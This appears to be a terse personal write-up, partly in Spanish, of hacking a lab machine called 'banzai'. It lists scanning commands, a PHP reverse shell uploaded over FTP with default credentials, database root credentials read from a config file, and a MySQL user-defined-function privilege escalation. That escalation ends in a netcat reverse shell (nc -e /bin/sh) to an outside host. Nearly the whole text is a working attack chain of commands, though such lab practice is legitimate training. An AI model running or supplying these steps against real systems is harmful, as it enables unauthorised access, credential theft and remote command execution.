nmap -A -p- -oA banzai 192.168.137.56 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA banzai 192.168.137.47

nmap -sU -O -p- -oA banzai-udp 192.168.137.56

nikto -h 192.168.137.56:80

Pasted image 20210925185344.png

Pasted image 20210925185304.png

whatweb http://192.168.137.56

Pasted image 20210925185546.png

Bajamos php-reverse-shell.php y cambiamos la ip y el puerto

Pasted image 20210925185858.png

cp /home/kali/boxes/php-reverse-shell.php .

ftp 192.168.137.56

admin:admin

put php-reverse-shell.php

Pasted image 20210925185916.png

nc -lvnp 22

http://192.168.137.56/php-reverse-shell.php

Pasted image 20210925190512.png

cat /var/www/config.php

root:EscalateRaftHubris123

Pasted image 20210925190815.png

ps aux | grep mysql

Pasted image 20210925190935.png

https://github.com/rapid7/metasploit-framework/blob/master/data/exploits/mysql/lib_mysqludf_sys_64.so

cp /home/kali/Downloads/lib_mysqludf_sys_64.so .

ftp 192.168.137.56

put lib_mysqludf_sys_64.so

Pasted image 20210925192217.png

mysql -u root -p

Enter password: EscalateRaftHubris123

Pasted image 20210925192454.png

use mysql;

create table cuervox(line blob);

insert into cuervox values(load_file('/var/www/html/lib_mysqludf_sys_64.so'));

select * from cuervox into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';

create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';

Pasted image 20210925193416.png

nc -lvnp 22

select sys_exec('nc -e /bin/sh 192.168.49.137 22');

Pasted image 20210925193313.png

boxes

copyright©2022 Cu3rv0x all rights reserved